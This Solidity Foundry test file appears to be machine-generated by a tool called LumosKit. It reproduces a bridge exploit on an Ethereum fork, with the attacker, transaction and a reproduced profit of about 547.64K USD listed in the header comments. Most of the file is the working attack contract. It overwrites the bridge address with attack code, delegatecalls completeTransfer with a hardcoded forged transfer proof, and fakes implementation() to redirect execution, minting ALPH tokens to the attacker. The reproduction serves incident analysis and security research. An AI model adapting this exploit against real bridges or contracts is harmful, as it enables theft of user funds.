// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.20;

import {Test, console2} from "forge-std/Test.sol";
import {LumosPoCBase} from "./LumosPoCBase.sol";

// @KeyInfo - Total Lost : N/A
// Attacker : 0x6681ebc82551fe52fdb48e65872e85a3ae06921d
// Attack Contract : 0x579a3bde631c3d8068cbfe3dc45b0f14ec18dd43
// Vulnerable Contract : 0x579a3bde631c3d8068cbfe3dc45b0f14ec18dd43
// Attack Tx : 0x06cc0f36159d7094359d88fe1d43cda601e8644282ba305c5ffbd013b524c6b4
// Block : 25207242
// Chain : Ethereum
// Analysis :
//
// @Reproduction
// Verdict : pass
// Economic Proof : attacker_profit_reproduction
// Reproduced Value : 547.64K USD
//
// @POC Author
// Generated by LumosKit

contract AttackTest is LumosPoCBase {
    address constant ATTACKER_EOA = LumosAddresses.attacker_eoa;
    address constant ATTACK_CONTRACT = LumosAddresses.TokenBridge;
    uint256 constant FORK_BLOCK = 25207241;
    uint256 constant TX_TIMESTAMP = 1780132679;
    uint256 constant TX_BLOCK_NUMBER = 25207242;
    uint256 constant TX_VALUE = 0;

    function setUp() public {
        vm.createSelectFork(vm.envString("LUMOSKIT_FORK_ENDPOINT"));
        if (TX_TIMESTAMP != 0) vm.warp(TX_TIMESTAMP);
        if (TX_BLOCK_NUMBER != 0) vm.roll(TX_BLOCK_NUMBER);
    }

    function testPoC() public {
        _runExploit();
    }

    function _runExploit() internal {
        vm.startPrank(ATTACKER_EOA, ATTACKER_EOA);
        OurAttack attack;
        if (ATTACK_CONTRACT != address(0)) {
            _installRuntime();
            attack = OurAttack(payable(ATTACK_CONTRACT));
        } else {
            attack = new OurAttack();
        }
        _expectOutcome(address(attack), address(0));
        _snapProfit();
        _logBalances("Before exploit");
        attack.attack{value: TX_VALUE}();
        _logBalances("After exploit");
        vm.stopPrank();
        _assertProfit();
    }

    function _installRuntime() internal {
        vm.etch(ATTACK_CONTRACT, type(OurAttack).runtimeCode);
        vm.allowCheatcodes(ATTACK_CONTRACT);
    }

    function _expectOutcome(address attack, address helper) internal {
        attack;
        helper;
        _expectProfit(LumosAddresses.attacker_eoa, address(0), LumosAddresses.ALPH, "ALPH", 13757076372950000000000000);
    }
}

contract OurAttack {
    // - role=attacker_callback selector=0x5c60da1b function_id=0x579a3bde631c3d8068cbfe3dc45b0f14ec18dd43|0x5c60da1b|0x5c60da1b|len:4|input:4f9f15f57ddd6f76|ct:STATICCALL|attacker_callback
    // - role=attacker_entry selector=0xc6878519 function_id=0x579a3bde631c3d8068cbfe3dc45b0f14ec18dd43|0xc6878519|0xc6878519|len:452|input:f396159d3af21c8a|ct:CALL|attacker_entry

    function attack() external payable {
        _attack();
    }

    function _callback() internal {
        _markCallback(0);
        {
            bytes memory delegateData = abi.encodeWithSignature("implementation()"); // observed selector 0x5c60da1b
            (bool ok,) = LumosAddresses.BridgeImplementation.delegatecall(delegateData);
            require(ok, "delegatecall failed"); // delegatecall implementation()
        }
        {
            bytes memory delegateData = abi.encodeWithSignature("implementation()"); // observed selector 0x5c60da1b
            (bool ok,) = LumosAddresses.BridgeImplementation.delegatecall(delegateData);
            require(ok, "delegatecall failed"); // delegatecall implementation()
        }
    }

    function _attack() internal {
        {
            bytes memory completeTransferProof =
                hex"01000000000300db1be613ab89b52aa6b70d6e005fcb2304840dbf0ca2731f15313e5c72f95ae422c76d4be67c97d26c499a8bf7e63c6dc820c194d791d53596d59fc668ceea8e0101df38e83a68db1d6584b7e3234fe8452ded4df53359876a81695ad92dd1d338e5381601582000f3415b2f280a98dd282f716ba6d41bd066318f433ca1c943d7090103412bbba05d84388d49a6cc63efc84df531fc15c91ca7d8b0115d7dbd61cea9903f483d59bd98061503501a5bd47380195b8c94b88cff51f88b59060e84dd87f2006a1a9d3439e3ed8a00ff00027f42f8e21128e70c7a30098a32c5c388de7eb4ffc6ef7dd86f72e8e11acc480000000000000f423dcd010000000000000000000000000000000000000000000000000004e332e5092798000000000000000000000000000000000000000000000000000000000000000000ff00146681ebc82551fe52fdb48e65872e85a3ae06921d0000000000000000000000000000000000000000000000000000000000000000";
            bytes memory delegateData = abi.encodeWithSignature("completeTransfer(bytes)", completeTransferProof); // observed selector 0xc6878519
            (bool ok,) = LumosAddresses.BridgeImplementation.delegatecall(delegateData);
            require(ok, "delegatecall failed"); // delegatecall completeTransfer(bytes)
        }
    }

    receive() external payable {}

    function implementation() external payable {
        bytes memory ret = hex"000000000000000000000000deb8c2c57c7de48d3ad5a980be3dd23868262b6a";
        assembly { return(add(ret, 32), mload(ret)) }
    }

    function completeTransfer(bytes calldata arg0) external payable {
        arg0;
        _attack();
        bytes memory ret = hex"";
        assembly { return(add(ret, 32), mload(ret)) }
    }

    fallback() external payable {
        _entryCb();
    }

    function _entryCb() internal {}

    mapping(uint256 => bool) private _lumosCallbackSeenFlag;
    mapping(uint256 => uint256) private _lumosEntryCallbackCursor;
    mapping(address => uint256) private _lumosBalancerVaultPreBalance;

    function _nextEntryCb(uint256 index) internal returns (uint256 ordinal) {
        ordinal = _lumosEntryCallbackCursor[index];
        _lumosEntryCallbackCursor[index] = ordinal + 1;
    }

    function _markCallback(uint256 index) internal {
        _lumosCallbackSeenFlag[index] = true;
    }

    function _recordBalancerFlash(address[] memory tokens) internal {
        for (uint256 i = 0; i < tokens.length; i++) {
            _lumosBalancerVaultPreBalance[tokens[i]] =
                IERC20Like(tokens[i]).balanceOf(0xBA12222222228d8Ba445958a75a0704d566BF2C8);
        }
    }

    function lumosRecordBalancerFlashLoanPreBalances(address[] memory tokens) external {
        _recordBalancerFlash(tokens);
    }

    function lumosBalancerVaultPreBalance(address token) external view returns (uint256) {
        return _lumosBalancerVaultPreBalance[token];
    }
}

interface IERC20Like {
    function totalSupply() external view returns (uint256);
    function balanceOf(address account) external view returns (uint256);
    function allowance(address owner, address spender) external view returns (uint256);
    function approve(address spender, uint256 amount) external;
    function transfer(address to, uint256 amount) external;
    function transferFrom(address from, address to, uint256 amount) external;
}

interface ILumosWETHLike {
    function deposit() external payable;
}

library LumosArrayGuard {
    function capWithReserve(uint256 wanted, address token, address holder, uint256 reserve)
        internal
        view
        returns (uint256)
    {
        uint256 available = IERC20Like(token).balanceOf(holder);
        if (available > reserve) available -= reserve;
        else available = 0;
        return wanted > available ? available : wanted;
    }
}

interface IERC721Like {
    function ownerOf(uint256 tokenId) external view returns (address);
    function getApproved(uint256 tokenId) external view returns (address);
    function isApprovedForAll(address owner, address operator) external view returns (bool);
    function transferFrom(address from, address to, uint256 tokenId) external;
    function safeTransferFrom(address from, address to, uint256 tokenId) external;
}

interface ILumosUniswapV2PairLike {
    function mint(address to) external returns (uint256 liquidity);
    function burn(address to) external returns (uint256 amount0, uint256 amount1);
    function skim(address to) external;
    function sync() external;
    function swap(uint256 amount0Out, uint256 amount1Out, address to, bytes calldata data) external;
}

interface IMulticallLike {
    function multicall(bytes[] calldata data) external returns (bytes[] memory results);
}

struct LumosObservedCall {
    address target;
    bytes data;
}

library LumosAddresses {
    address internal constant ZERO = address(0);
    address internal constant Wormhole = 0x01e82b67367dE9f805E55de730D5007a752912A8; // LumosAddresses.Wormhole = 0x01e82b67367de9f805e55de730d5007a752912a8 label=Wormhole roles=observed_address|recipient source=etherscan_v2 confidence=high
    address internal constant BridgeImplementation = 0x0F843945075DF4EA9C8a21f0e0CcFD5eB073eEAb; // LumosAddresses.BridgeImplementation = 0x0f843945075df4ea9c8a21f0e0ccfd5eb073eeab label=BridgeImplementation roles=code_contract|recipient source=etherscan_v2 confidence=high
    address internal constant TokenBridge = 0x579a3bDE631c3d8068CbFE3dc45B0F14EC18dD43; // address(this) = 0x579a3bde631c3d8068cbfe3dc45b0f14ec18dd43 label=TokenBridge roles=asset|attacker_callback_contract|attacker_contract|attacker_entry_contract|code_contract|contract|localized_contract|observed_address|storage_contract source=etherscan_v2 confidence=high
    address internal constant ALPH = 0x590F820444fA3638e022776752c5eEF34E2F89A6; // LumosAddresses.ALPH = 0x590f820444fa3638e022776752c5eef34e2f89a6 label=BridgeToken token_symbol=ALPH roles=asset|contract|economic_asset|observed_address|profit_asset|recipient|sender|token_related source=etherscan_v2 confidence=high
    address internal constant attacker_eoa = 0x6681ebC82551fE52fDB48E65872e85a3ae06921d; // LumosAddresses.attacker_eoa = 0x6681ebc82551fe52fdb48e65872e85a3ae06921d label=attacker_eoa roles=attacker_eoa|contract|economic_holder|observed_address|profit_holder|recipient|sender source=tx_metadata.from confidence=high
    address internal constant BalancerVault = 0xBA12222222228d8Ba445958a75a0704d566BF2C8; // LumosAddresses.BalancerVault = 0xba12222222228d8ba445958a75a0704d566bf2c8 label=BalancerVault roles=known_protocol source=poc_sketch.known_addresses confidence=high
}

interface IWormhole {
    function parseAndVerifyVM(bytes calldata) external view;
}
